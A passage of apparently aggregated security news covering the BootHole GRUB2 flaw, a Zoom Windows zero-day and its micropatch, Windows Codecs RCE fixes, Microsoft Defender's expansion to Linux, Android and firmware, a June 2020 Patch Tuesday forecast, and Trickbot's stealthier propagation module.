“In addition, GRUB2 supports other operating systems, kernels and hypervisors such as Xen. The problem also extends to any Windows device that uses Secure Boot with the standard Microsoft Third Party UEFI Certificate Authority. Thus the majority of laptops, desktops, servers and workstations are affected, as well as network appliances and other special purpose equipment used in industrial, healthcare, financial and other industries. This vulnerability makes these devices susceptible to attackers such as the threat actors recently discovered using malicious UEFI bootloaders.”

The researchers have done a good job explaining in detail why the why, where and how of the vulnerability, and so did Kelly Shortridge, the VP of Product Management and Product Strategy at Capsule8. The problem effectively lies in the fact that a GRUB2 configuration file can be modified by attackers to make sure that their own malicious code runs before the OS is loaded.

The only good news is that the vulnerability can’t be exploited remotely. The attacker must first gain a foothold on the system and escalate privileges to root/admin in order to exploit it. Alternatively, they must have physical access to the target system.

The real danger, according to Shortridge, is if criminals incorporate this vulnerability into a bootkit, license it to bot authors, who will deploy or sell the bootkit-armed bots.

“This pipeline will not pop out pwnage overnight, so the question becomes whether mitigations can be successfully rolled out before criminals can scale this attack,” she noted.

A complex mitigation process

The main problem is that fixing this flaw on such a great number of systems will be a massive, complex and partly manual undertaking.

“Full mitigation of this issue will require coordinated efforts from a variety of entities: affected open-source projects, Microsoft, and the owners of affected systems, among others,” Eclypsium researchers noted.

“This will include: updates to GRUB2 to address the vulnerability; Linux distributions and other vendors using GRUB2 will need to update their installers, bootloaders, and shims [a small app that contains the vendor’s certificate and code that verifies and runs the GRUB2 bootloader]; new shims will need to be signed by the Microsoft 3rd Party UEFI CA; administrators of affected devices will need to update installed versions of operating systems in the field as well as installer images, including disaster recovery media; and eventually the UEFI revocation list (dbx) needs to be updated in the firmware of each affected system to prevent running this vulnerable code during boot.”

Again, both Eclypsium and Shortridge helpfully explained in detail the whole process and the dangers it holds for organizations. In addition to the complex hoop jumping of the mitigation process, orgs should also be monitoring their systems for threats and ransomware that use vulnerable bootloaders to infect or damage systems.

Eclypsium researchers have provided recommendations and have linked to the various reference materials by Microsoft, Debian, Canonical, Red Hat, HPE, SUSE, VMware and others who need to help users and admins fix the problem.

They’ve also powershell and bash scripts to help administrators identify certificates revoked by the various OS vendors when they push out security updates for CVE-2020-10713.

Other discovered vulnerabilities

After being notified of the existence of BootHole, Canonical (the company that develops Ubuntu) and others went in search for other security holes in GRUB2. They discovered seven related vulnerabilities, whose mitigations are included in today’s release for Ubuntu and other major Linux distributions.

“Given the difficulty of this kind of ecosystem-wide update/revocation, there is a strong desire to avoid having to do it again six months later,” Eclypsium researchers noted.

“To that end, a large effort — spanning multiple security teams at Oracle, Red Hat, Canonical, VMware, and Debian — using static analysis tools and manual review helped identify and fix dozens of further vulnerabilities and dangerous operations throughout the codebase that do not yet have individual CVEs assigned.”

Zoom zero-day flaw allows code execution on victim’s Windows machine

A zero-day vulnerability in Zoom for Windows may be exploited by an attacker to execute arbitrary code on a victim’s computer. The attack doesn’t trigger a security warning and can be pulled off by getting the victim to perform a typical action such as opening a received document file.

Zoom zero-day Windows

Acros Security, the creators of 0patch, have pushed out a micropatch that will close the security hole until Zoom Video Communications delivers a fix.

About the vulnerability

The vulnerability was discovered by an unnamed researcher and reported to Acros Security, who reported it to Zoom earlier today.

Is is present in all supported versions of the Zoom client for Windows, and the 0patch team created a micropatch for all (starting with v5.0.3 and all up to the latest one – v5.1.2).

The flaw is only exploitable if the client is installed on Windows 7 and older Windows systems, due to a specific system property.

“The flaw is likely also exploitable on Windows Server 2008 R2 and earlier though we didn’t test that; either way, our micropatch will protect you wherever you’re using the Zoom client,” Acros Security CEO Mitja Kolsek told Help Net Security.

“While Microsoft’s official support for Windows 7 has ended this January, there are still millions of home and corporate users out there prolonging its life with Microsoft’s Extended Security Updates or with 0patch,” he noted.

He also says that the flaw can be exploited through several attack scenarios, but they will refrain from publishing more detailed information and the PoC exploit until Zoom fixes the issue or decides not to fix it.

Options available to users

Until Zoom pushes out a fix, the options for users who wish to stay safe are as follows:

  • Temporarily stop using Zoom
  • Update Windows to a newer version
  • Implement the micropatch.

“We were able to quickly create a micropatch that removes the vulnerability in four different places in the [software’s] code,” Kolsek noted. The micropatches are available for free to all 0patch users until a fix is released.

“0patch is designed such that when a vulnerable executable module is replaced by a new version, any micropatches that were made for that vulnerable module automatically stop applying (because the cryptographic hash of the module changes). When Zoom issues an updated Client for Windows and you install it on your computer, our micropatch will become obsolete,” he explained.

“In case this updated Zoom Client does not fix this vulnerability, we’ll port the micropatch and make it available for free as quickly as possible.”

Microsoft fixes two RCE flaws affecting Windows 10 machines

Microsoft has released fixes for two remote code execution (RCE) vulnerabilities in the Microsoft Windows Codecs Library on Windows 10 machines.

RCE Windows 10

The vulnerabilities

Both flaws – CVE-2020-1425 and CVE-2020-1457 – arose because of the way the Microsoft Windows Codecs Library handled objects in memory.

CVE-2020-1425 could allow attackers to obtain information to further compromise the user’s system, and CVE-2020-1457 would allow them to execute arbitrary code, all by tricking users into opening an image file.

“To successfully exploit this vulnerability, an attacker would need to deliver a specially crafted image file, like a JPG or TIFF or PNG, and convince the targeted victim to open the file. Data hidden within the image would then be processed by the image rendering program, executing arbitrary code on the endpoint. This code could be used to install a backdoor, allowing an attacker to modify user credentials, execute more code, or navigate laterally through the corporate network,” Richard Melick, Senior Technical Product Manager, Automox, explained.

The vulnerabilities were discovered by Abdul-Aziz Hariri of Trend Micro’s Zero Day Initiative and they are not being actively exploited in the wild.

Silver linings

What initially seemed like critical out-of-band patches for Windows 10 and Windows Server 2019 systems turned out to be slightly less urgent patches since the flaws affect only Windows 10 systems and only those users who have installed the optional HEVC or “HEVC from Device Manufacturer” media codecs from Microsoft Store, limiting thusly the pool of machines open to attack.

Affected customers also didn’t have to do anything to receive the update, as they were automatically updated by (the consumer) Microsoft Store. Enterprise customers using Store for Business received the update in the same manner.

Microsoft has noted, though, that users who have turned off automatic updating for Microsoft Store apps should check for them with the Microsoft Store App or risk going without them.

Microsoft is adding Linux, Android, and firmware protections to Windows

Screenshot of antivirus protection.

Microsoft is moving forward with its promise to extend enterprise security protections to non-Windows platforms with the general release of a Linux version and a preview of one for Android. The software maker is also beefing up Windows security protections to scan for malicious firmware.

The Linux and Android moves—detailed in posts published on Tuesday here, here, and here—follow a move last year to ship antivirus protections to macOS. Microsoft disclosed the firmware feature last week.

Premium pricing

All the new protections are available to users of Microsoft Advanced Threat Protection and require Windows 10 Enterprise Edition. Public pricing from Microsoft is either non-existent or difficult to find, but according to this site, costs range from $30 to $72 per machine per year to enterprise customers.

In February, when the Linux preview became available, Microsoft said it included antivirus alerts and “preventive capabilities.” Using a command line, admins can manage user machines, initiate and configure antivirus scans, monitor network events, and manage various threats.

“We are just at the beginning of our Linux journey and we are not stopping here!” Tuesday’s post announcing the Linux general availability said. “We are committed to continuous expansion of our capabilities for Linux and will be bringing you enhancements in the coming months.”

The Android preview, meanwhile, provides several protections, including:

  • The blocking of phishing sites and other high-risk domains and URLs accessed through SMS/text, WhatsApp, email, browsers, and other apps. The features use the same Microsoft Defender SmartScreen services that are already available for Windows so that decisions to block suspicious sites will apply across all devices on a network.
  • Proactive scanning for malicious or potentially unwanted applications and files that may be downloaded to a mobile device.
  • Measures to block access to network resources when devices show signs of being compromised with malicious apps or malware.
  • Integration to the same Microsoft Defender Security Center that’s already available for Windows, macOS, and Linux.

Last week, Microsoft said it had added firmware protection to the premium Microsoft Defender. The new offering scans Unified Extensible Firmware Interface, which is the successor to the traditional BIOS that most computers used during the boot process to locate and enumerate hardware installed.

The firmware scanner uses a new component added to virus protection already built into Defender. Hacks that infect firmware are particularly pernicious because they survive reinstallations of the operating system and other security measures. And because firmware runs before Windows starts, it has the ability to burrow deep into an infected system. Until now, there have been only limited ways to detect such attacks on large fleets of machines.

It makes sense that the extensions to non-Windows platforms are available only to enterprises and cost extra. I was surprised, however, that Microsoft is charging a premium for the firmware protection and only offering it to enterprises. Plenty of journalists, attorneys, and activists are equally if not more threatened by so-called evil maid attacks, in which a housekeeper or other stranger has the ability to tamper with firmware during brief physical access to a computer.

Microsoft has a strong financial incentive to make Windows secure for all users. Company representatives didn’t respond to an email asking if the firmware scanner will become more widely available.

June 2020 Patch Tuesday forecast: Steady as she goes

It’s hard to believe we’re almost halfway through our 2020 Patch Tuesdays already. Working from home has a strange effect on time – each day seems very long, but the weeks are flying by. Regardless, another patch Tuesday is coming next week. May 2020 Patch Tuesday was pretty light on updates as predicted, so I’m expecting we’ll see a more standard release of updates from Microsoft this month.

June 2020 Patch Tuesday forecast

Windows 10 and Windows Server

One item to factor into your patch Tuesday process is the new release of Windows 10 version 2004 and Windows Server version 2004. These latest versions of Windows 10 were released without major fanfare, as Microsoft pre-announced, on May 27.

Unlike the 1903 to 1909 update which was done via feature enablement, this is a full, new release. The good news is that the update time has come down significantly from earlier versions such as 1703 which could take up to 90 minutes on average

For those of you using Windows Update for Business for deployment, there are several enhancements to check out. One of operational importance is the new ability in InTune to identify the target version you want to update to and maintain on all your devices. You can also configure this as a Group Policy or Configuration Service Provider (CSP) policy.

This update also contains enhancements to existing security features in Windows 10. Application Guard, which uses containers, now supports Microsoft Edge on Chromium and can be enabled to enforce protection when Microsoft 365 applications are opened. Microsoft also rolled out more configuration options around their Sandbox feature which was introduced back in version 1903. Windows 10 version 2004 will follow the usual 18-month support model and you can find out more details around the entire set of 2004 features here.

Microsoft announced that starting in May 2020, they are pausing all optional, non-security updates for Windows client and server products (Windows 10, version 1909 down to Windows Server 2008 SP2). They are doing this to relieve the pressure of updating systems while everyone is working remotely. These updates will be included in the regular patch Tuesday releases.

Just a quick reminder Microsoft also delayed the end-of-support date for the Enterprise and Education versions of Windows 10 1709 to October 13 and the Sharepoint 2010 Family (SharePoint Foundation 2010, SharePoint Server 2010, and Project Server 2010) to April 13, 2021. Along with this extended timeline comes the need to continue patching these older systems with the latest security updates.

June 2020 Patch Tuesday forecast

  • Expect to see the full set of Microsoft operating system and application updates this month with the exception of .NET updates which were released in May. We didn’t see any of the server updates last month, e.g. SQL, Exchange, etc. so expect at least a few of these.
  • A new set of Extended Security Updates (ESUs) for Windows 7 and Server 2008/2008 R2 should be released along with the standard updates.
  • Servicing stack updates (SSUs) have continued to be released almost monthly and some are mandatory to install before deploying the latest cumulative or security updates. Pay careful attention to the requirements surrounding these in order to prevent problems during your patch cycle.
  • Adobe released a major security update for Acrobat and Reader last month and a minor security release this week. Adobe Flash has not seen a security update for a while, so it could happen.
  • Apple released their security updates for iTunes, iCloud, and the supported operating systems last week.
  • Google released a security update for Chrome 83 this week.
  • Mozilla provided security updates this week for Firefox 77, Firefox ESR 68.9, and Thunderbird 68.9

June Patch Tuesday will be light on major third-party releases, allowing us to focus on the Microsoft releases. With 2-3 months of managing updates in this strange new world and an expected standard release set from Microsoft, June Patch Tuesday should be steady as she goes.

New propagation module makes Trickbot more stealthy

Trickbot infections of Domain Controller (DC) servers has become more difficult to detect due to a new propagation module that makes the malware run from memory, Palo Alto Networks researchers have found.

That also means that the malware infection can’t survive a shutdown or reboot of the system, but the stealth vs persistence tradeoff is likely to work in the attackers’ favor since servers are rarely shut down or rebooted.

Trickbot’s evolution

Trickbot started as a banking Trojan / information stealer. It was first detected in late 2016 and it’s believed to be the work of the same developers that created the Dyre (aka Dyreza) credential stealer malware.

As predicted at the time, the malware has become a serious threat. Thanks to its modular architecture, the malicious developers have steadily equipped it with additional capabilities, including the ability to disable Microsoft’s built-in antivirus Windows Defender, gather system and account information, send out spam, and spread to other computers on the same network by exploiting SMB vulnerabilities.

Trickbot is also often dropped by Emotet as a secondary payload or is delivered via booby-trapped email attachments, but its lateral propagation mechanism is a big reason why it’s become the bane of many a company’s existence.

A more stealthy mechanism for infecting Domain Controllers

“Trickbot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC),” the researchers explained.

Up until April 2020, the malware used three modules for propagation: mshare, tab and mworm:

Trickbot propagation

Since then, the mworm module has been swapped with the nworm module, which:

  • Retrieves an encrypted or encoded malware binary via HTTP traffic (mworm retrieved an unencrypted/unencoded binary)
  • Decodes the binary and runs it in the victim system’s RAM, leaving no discoverable artifacts on an infected DC

Trickbot propagation

As noted before, the in-memory-malware can’t survive a system reboot or shutdown, but the creators are betting on DCs being continuously operational for a long while.

The importance of preventing Trickbot infections

We already know that Trickbot developers are constantly working on improving the malware. This is just the latest improvement and evolution step to stay one step ahead of the defenders.

The best way to keep Trickbot infections at bay is to constantly and promptly update and patch Microsoft clients and servers. Patching the SMB vulnerabilities exploited by Trickbot to propagate laterally on the network is essential to preventing constant reinfections.

The malware, on its own, is definitely bad new for enterprises, but Trickbot infections are also likely to be just one small part of a larger attack that will end with ransomware being deployed on many company systems and an even bigger headache to the victim organizations.